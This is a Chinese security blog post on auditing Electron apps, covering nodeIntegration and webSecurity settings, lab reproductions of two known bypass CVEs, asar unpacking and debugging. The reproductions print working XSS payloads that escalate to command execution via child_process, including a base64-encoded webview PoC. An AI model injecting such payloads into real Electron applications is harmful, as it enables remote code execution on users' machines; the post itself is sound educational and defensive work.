

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon.png">
  <link rel="icon" href="/img/icon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="jelly">
  <meta name="keywords" content="">
  
  <title>如何审计 Electron 应用代码 - jelly&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":"14de5c0cf6db6044f06b32ef50694a98","google":"G-1S553HH16G","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Jelly's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/doll.webp') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="如何审计 Electron 应用代码">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-09-12 11:53" pubdate>
        2021年9月12日 中午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      27
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">如何审计 Electron 应用代码</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：2 个月前
                
              </p>
            
            <div class="markdown-body">
              <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>最近被 XMind 2020 XSS 导致远程代码执行的漏洞所吸引，复现过程比较简单，于是想研究一下漏洞造成的原因，因为 XMind 属于 electorn 应用，应用了很多 Web 前端技术，然后就发现自己什么也看不懂。所以后面收集了很多知识，构成了这篇文章，相信看完这篇文章后，大家会对 electorn 审计会有大概的思路。</p>
<h1 id="Electron的安全策略"><a href="#Electron的安全策略" class="headerlink" title="Electron的安全策略"></a>Electron的安全策略</h1><h2 id="nodeIntegration"><a href="#nodeIntegration" class="headerlink" title="nodeIntegration"></a>nodeIntegration</h2><p>nodeIntegration 是用来隔离不受信任的资源，如来自不受信任的远程服务器的代码在本地被执行，将会造成安全问题。</p>
<p>例如在默认的 <code>BrowserWindow</code>中显示一个远程网站。如果攻击者以某种方式设法改变所述内容 (通过直接攻击源或者通过在应用和实际目的地之间进行攻击) ，他们将能够在用户的机器上执行本地代码。</p>
<p>拆分下 nodeIntegration 来理解一下， node 指的是 Node.js ， integration 英文是集成的意思，在 Electron 中默认 nodeIntergration 为 False，表示禁用 Node.js 集成，这样可以有助于防止XSS攻击升级为“远程代码执行” (RCE) 攻击。</p>
<p>官方的指导方法如下：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-comment">// 不推荐</span><br><span class="hljs-keyword">const</span> mainWindow = <span class="hljs-keyword">new</span> BrowserWindow(&#123;<br>  <span class="hljs-attr">webPreferences</span>: &#123;<br>    <span class="hljs-attr">nodeIntegration</span>: <span class="hljs-literal">true</span>,<br>    <span class="hljs-attr">nodeIntegrationInWorker</span>: <span class="hljs-literal">true</span><br>  &#125;<br>&#125;)<br>mainWindow.loadURL(<span class="hljs-string">&#x27;https://example.com&#x27;</span>)<br></code></pre></td></tr></table></figure>

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-comment">// 推荐</span><br><span class="hljs-keyword">const</span> mainWindow = <span class="hljs-keyword">new</span> BrowserWindow(&#123;<br>  <span class="hljs-attr">webPreferences</span>: &#123;<br>    <span class="hljs-attr">preload</span>: path.join(app.getAppPath(), <span class="hljs-string">&#x27;preload.js&#x27;</span>)<br>  &#125;<br>&#125;)<br>mainWindow.loadURL(<span class="hljs-string">&#x27;https://example.com&#x27;</span>)<br></code></pre></td></tr></table></figure>

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs js">&lt;!-- Bad --&gt;<br><span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">webview</span> <span class="hljs-attr">nodeIntegration</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;page.html&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">webview</span>&gt;</span></span><br>&lt;!-- Good --&gt;<br><span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">webview</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;page.html&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">webview</span>&gt;</span></span><br></code></pre></td></tr></table></figure>

<h2 id="WebSecurity"><a href="#WebSecurity" class="headerlink" title="WebSecurity"></a>WebSecurity</h2><p>WebSecurity 中包括同源策略的设置， WebSecurity 默认值为 True ，即打开状态。</p>
<p>如果禁用 WebSecurity 将会禁止同源策略并且将 <code>allowRunningInsecureContent</code> 属性置 <code>true</code>。 换句话说，这将使得来自其他站点的非安全代码被执行。</p>
<p>官方推荐的一些配置：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-comment">// 不推荐</span><br><span class="hljs-keyword">const</span> mainWindow = <span class="hljs-keyword">new</span> BrowserWindow(&#123;<br>  <span class="hljs-attr">webPreferences</span>: &#123;<br>    <span class="hljs-attr">webSecurity</span>: <span class="hljs-literal">false</span><br>  &#125;<br>&#125;)<br></code></pre></td></tr></table></figure>

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-comment">// 推荐</span><br><span class="hljs-keyword">const</span> mainWindow = <span class="hljs-keyword">new</span> BrowserWindow()<br></code></pre></td></tr></table></figure>

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs js">&lt;!-- Bad --&gt;<br><span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">webview</span> <span class="hljs-attr">disablewebsecurity</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;page.html&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">webview</span>&gt;</span></span><br>&lt;!-- Good --&gt;<br><span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">webview</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;page.html&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">webview</span>&gt;</span></span><br></code></pre></td></tr></table></figure>

<h1 id="nodeIntegration-绕过漏洞"><a href="#nodeIntegration-绕过漏洞" class="headerlink" title="nodeIntegration 绕过漏洞"></a>nodeIntegration 绕过漏洞</h1><p>历史上出现过两个 nodeIntegration 绕过漏洞，编号分别为CVE-2018-15685，CVE-2018-1000136。</p>
<h2 id="CVE-2018-15685"><a href="#CVE-2018-15685" class="headerlink" title="CVE-2018-15685"></a>CVE-2018-15685</h2><p>WebPreferences Vulnerability 远程代码执行漏洞。</p>
<p>影响版本：3.0.0-beta.6、2.0.7、 1.8.7 、1.7.15</p>
<h3 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h3><p>在该漏洞版本中，创建的每个窗口都设置了以下属性：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs js">win.webPreferences = &#123; <br>  <span class="hljs-attr">allowRunningInsecureContent</span>: <span class="hljs-literal">false</span>, <br>  <span class="hljs-attr">contextIsolation</span>: <span class="hljs-literal">true</span>,<br>  <span class="hljs-attr">nodeIntegration</span>: <span class="hljs-literal">false</span>,<br>    <span class="hljs-attr">nativeWindowOpen</span>: <span class="hljs-literal">true</span><br>&#125;<br></code></pre></td></tr></table></figure>

<p>可以看到也禁止了 Node.js 继承，但问题在于窗口的属性无法通过嵌套窗口和iframe正确地继承，而且嵌套窗口和 iframe 中的默认设置没有禁止 Node.js 继承，所以通过嵌套窗口或者使用 iframe 就可以绕过 nodeIntegration 的限制导致远程代码执行。</p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>这里使用 vulhub 复现方便一点。</p>
<p>1）环境搭建</p>
<p>执行如下命令编译一个包含漏洞的应用：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker-compose run -e PLATFORM=win64 --rm electron<br></code></pre></td></tr></table></figure>

<p>其中PLATFORM的值是运行该应用的操作系统，可选项有：<code>win64</code>、<code>win32</code>、<code>mac</code>、<code>linux</code>。</p>
<p>编译完成后，再执行如下命令，启动web服务：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker-compose run --rm -p 8080:80 web<br></code></pre></td></tr></table></figure>

<p>此时，访问<code>http://your-ip:8080/cve-2018-15685.tar.gz</code>即可下载编译好的应用。</p>
<p>2）复现过程</p>
<p>打开漏洞 electron 程序，界面如下，输入的内容会被显示在程序页面中：</p>
<img src="img/electron审计/image-20210513152231217.png" srcset="/img/loading.gif" lazyload alt="image-20210513152231217" style="zoom:50%;" />

<p>简单验证发现存在 XSS 漏洞</p>
<img src="img/electron审计/image-20210513152548966.png" srcset="/img/loading.gif" lazyload alt="image-20210513152548966" style="zoom:50%;" />

<p>构造一条命令执行，发现程序没有任何反馈，因为程序默认设置了    nodeIntegration=false</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">x</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">&quot;const exec = require(&#x27;child_process&#x27;).exec;exec(&#x27;id&#x27;).stdout.on(&#x27;data&#x27;, function (data) &#123;alert(data);&#125;)&quot;</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>通过 window.open().open() 其实相当于打开了一个子窗口，在子窗口下再打一个子窗口。（打开一个子窗口不够）</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">x</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">&quot;window.open().open(&#x27;data:text/html,&lt;script&gt;const exec = require(\&#x27;child_process\&#x27;).exec;exec(\&#x27;whoami\&#x27;).stdout.on(\&#x27;data\&#x27;, function (data) &#123;alert(data);&#125;)&lt;/script&gt;&#x27;)&quot;</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>效果如下：</p>
<img src="img/electron审计/image-20210513153830743.png" srcset="/img/loading.gif" lazyload alt="image-20210513153830743" style="zoom: 33%;" />

<h3 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h3><p>这时官方的修复文档： <a target="_blank" rel="noopener" href="https://www.electronjs.org/blog/web-preferences-fix">https://www.electronjs.org/blog/web-preferences-fix</a>   ，修复方案是强制将顶层windows webPreferences 应用于无限深的所有子窗口。这样再多少个 open 也没有用了😁。</p>
<h2 id="CVE-2018-1000136"><a href="#CVE-2018-1000136" class="headerlink" title="CVE-2018-1000136"></a>CVE-2018-1000136</h2><p>Electron nodeIntegration存在绕过漏洞，允许攻击者远程命令执行。漏洞编号：CVE-2018-1000136。</p>
<p>影响版本：Electron 版本&lt; 1.7.13, &lt; 1.8.4, 或 &lt; 2.0.0-beta.3</p>
<p>该漏洞利用前提是 Electron 应用存在 XSS 漏洞，如果应用没有对用户的输入做安全检查或过滤就可能存在这种漏洞。通过 XSS 漏洞可以利用 <code>webview</code> 标签的特性将 nodeIntegration: false 传入应用 webPreferences 中，来移除对 Node.js 的访问，从而造成远程命令执行。</p>
<p>利用 POC</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript"></span><br><span class="javascript"> <span class="hljs-keyword">var</span> x = <span class="hljs-built_in">window</span>.open(<span class="hljs-string">&#x27;data://yoloswag&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;webviewTag=yes,show=no&#x27;</span>);</span><br><span class="javascript"> x.eval(</span><br><span class="javascript">   <span class="hljs-string">&quot;var webview = new WebView;&quot;</span>+</span><br><span class="javascript">   <span class="hljs-string">&quot;webview.setAttribute(&#x27;webpreferences&#x27;, &#x27;webSecurity=no, nodeIntegration=yes&#x27;);&quot;</span>+</span><br><span class="javascript">   <span class="hljs-string">&quot;webview.src = `data:text/html;base64,PHNjcmlwdD5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbHMgLWxhJywgZnVuY3Rpb24gKGUscikgeyBhbGVydChyKTt9KTs8L3NjcmlwdD4=`;&quot;</span>+</span><br><span class="javascript">   <span class="hljs-string">&quot;document.body.appendChild(webview)&quot;</span></span><br><span class="javascript"> );</span><br><span class="javascript"> </span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br></code></pre></td></tr></table></figure>

<h1 id="解包"><a href="#解包" class="headerlink" title="解包"></a>解包</h1><p>electron 应用打包为程序后源代码在 Content/Resources/app 目录下：</p>
<img src="img/electron审计/image-20210513164446175.png" srcset="/img/loading.gif" lazyload alt="image-20210513164446175" style="zoom:50%;" />

<p>Electron 还提供了一个 npm 软件包 asar 来管理这些文件，可以将源码压缩保存，后缀为 asar。我们平时下载到的 electron 应用源码基本都会用这个格式保存，下面记录下解包的方法。</p>
<p>1）安装好npm</p>
<p>新版本的Node.js中自动集成了npm，npm是JS的包管理器。在 mac 中可以使用下面的命令安装 Node.js：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ brew install node<br></code></pre></td></tr></table></figure>

<p>2）安装asar</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ npm install asar -g<br></code></pre></td></tr></table></figure>

<p>3）解包命令</p>
<p>以macOS平台为例，在xxx.app/Contents/Resources下找到app.asar</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ asar e app.asar &lt;输出目录&gt;<br></code></pre></td></tr></table></figure>

<p>这里输出目录最好固定为 app ，这样在封装时避免出错。</p>
<p>解包后就可以正常开始审计代码了。</p>
<p>如果对文件有修改后想重新封装使用如下命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ asar p &lt;源码目录&gt; app.asar<br></code></pre></td></tr></table></figure>

<h1 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h1><p>electron有主进程和渲染进程，所以调试部分也分为两大块，即调试主进程和渲染进程。</p>
<h2 id="调试渲染进程"><a href="#调试渲染进程" class="headerlink" title="调试渲染进程"></a>调试渲染进程</h2><p>调试渲染进程和调试浏览器的方法基本差不多。在运行electron 应用之后可以通过下面两种方式打开调试工具。</p>
<h3 id="手动打开"><a href="#手动打开" class="headerlink" title="手动打开"></a>手动打开</h3><p>在导航栏： View-&gt;Toogle Developer Tools</p>
<img src="img/electron审计/image-20210513182926259.png" srcset="/img/loading.gif" lazyload alt="image-20210513182926259" style="zoom:50%;" />

<p>但是该方法局限性比较大，很多软件并不会把调试工具放在导航栏中。</p>
<h3 id="代码打开"><a href="#代码打开" class="headerlink" title="代码打开"></a>代码打开</h3><p>在主进程(一般默认的就是main.js)中使用 <code>const mainWindow = new BrowserWindow</code> 实例化窗口的时候，加上如下一句功能代码：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-comment">// Open the DevTools.</span><br>mainWindow.webContents.openDevTools();<br></code></pre></td></tr></table></figure>

<p>一定要注意添加的位置：</p>
<img src="img/electron审计/image-20210513184422750.png" srcset="/img/loading.gif" lazyload alt="image-20210513184422750" style="zoom:50%;" />

<p>其中 openDevTools 可以接受一个参数，这个参数是个配置对象，一般会根据自己开发习惯在里面配置控制台打开的方向。当然也可以在控制台打开之后自己调整。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">mainWindow.webContents.openDevTools(&#123;<br>  mode:<span class="hljs-string">&#x27;bottom&#x27;</span><br>&#125;);<br></code></pre></td></tr></table></figure>

<p>最终效果如下：</p>
<img src="img/electron审计/image-20210513185033219.png" srcset="/img/loading.gif" lazyload alt="image-20210513185033219" style="zoom:50%;" />

<p>可以发现的是在调试渲染进程时是找不到 js 文件的。（谷歌调试找文件的快捷键：cmd+p）</p>
<img src="img/electron审计/image-20210514103853146.png" srcset="/img/loading.gif" lazyload alt="image-20210514103853146" style="zoom:50%;" />



<h2 id="调试主进程"><a href="#调试主进程" class="headerlink" title="调试主进程"></a>调试主进程</h2><p>1）使用 <code>--inspect=[port]</code> 来设置一个运行端口，比如在 package.json 中配置如下脚本</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-string">&quot;scripts&quot;</span>: &#123;<br>	 <span class="hljs-attr">&quot;start&quot;</span>: <span class="hljs-string">&quot;electron --inspect=5858 .&quot;</span>,<br> &#125;<br></code></pre></td></tr></table></figure>

<p>然后在目录下进入终端输入： <code>npm run start</code>。</p>
<p>2）浏览器输入： chrome://inspect，点击下方 inspect</p>
<img src="img/electron审计/image-20210514102206609.png" srcset="/img/loading.gif" lazyload alt="image-20210514102206609" style="zoom:50%;" />

<p>可以发现调试的全是 js 文件：</p>
<img src="img/electron审计/image-20210514104026146.png" srcset="/img/loading.gif" lazyload alt="image-20210514104026146" style="zoom:50%;" />

<h2 id="生产环境调试"><a href="#生产环境调试" class="headerlink" title="生产环境调试"></a>生产环境调试</h2><p>在上面看到调试 electron 还是比较麻烦的，这里推荐一个软件 debugtron 。</p>
<p>首先 debugtron 就会展示系统中已经安装的 electron 软件，可以看到我们日常使用的很多软件都是 electron，对于没有检测出来的 electron 软件，直接将软件拖入 debugtron 也可以了。</p>
<img src="img/electron审计/image-20210514104640115.png" srcset="/img/loading.gif" lazyload alt="image-20210514104640115" style="zoom:50%;" />

<p>这里简单看下使用方法，我把测试软件拖入 electron 后，程序会被自动打开，面板左侧会显示可调试的会话列表，包括主进程和渲染进程，可以根据标签来区分。右侧会显示主进程启动的日志：</p>
<img src="img/electron审计/image-20210514105512270.png" srcset="/img/loading.gif" lazyload alt="image-20210514105512270" style="zoom: 33%;" />

<p>查看版本的命令：<code>process.versions</code></p>
<img src="img/electron审计/image-20210826153820252.png" srcset="/img/loading.gif" lazyload alt="image-20210826153820252" style="zoom:50%;" />



<p>参考：</p>
<p>Electron的安全策略，参考官方文档：<a target="_blank" rel="noopener" href="https://www.bookstack.cn/read/electron-10-zh/tutorial-security.md">https://www.bookstack.cn/read/electron-10-zh/tutorial-security.md</a></p>
<p>CVE-2018-15685参考：<a target="_blank" rel="noopener" href="https://www.contrastsecurity.com/security-influencers/cve-2018-15685%E3%80%81">https://www.contrastsecurity.com/security-influencers/cve-2018-15685、</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2640">https://xz.aliyun.com/t/2640</a></p>
<p>electron 代码审计：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/Mang0/p/13269450.html%E3%80%81https://xz.aliyun.com/t/6998#toc-2">https://www.cnblogs.com/Mang0/p/13269450.html、https://xz.aliyun.com/t/6998#toc-2</a></p>
<p>electron 调试：<a target="_blank" rel="noopener" href="https://www.electronjs.org/docs/tutorial/debugging-main-process%EF%BC%8Chttps://blog.csdn.net/weixin_38080573/article/details/105048111">https://www.electronjs.org/docs/tutorial/debugging-main-process，https://blog.csdn.net/weixin_38080573/article/details/105048111</a></p>
<p>debugtron：<a target="_blank" rel="noopener" href="https://github.com/bytedance/debugtron">https://github.com/bytedance/debugtron</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E6%9D%82%E9%A1%B9/">杂项</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/09/dedecms/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">通过 DedeCMS 学习 php 代码审计</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/09/php_unserialize/">
                        <span class="hidden-mobile">php 反序列化漏洞</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"KoUUnhC8sqDPadKwA0C4f83s-gzGzoHsz","appKey":"FLKClsTKX9X9TPMSO1z9FK1T","placeholder":"说点什么","path":"window.location.pathname","avatar":"robohash","meta":["nick","mail","link"],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false,"requiredFields":[]},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
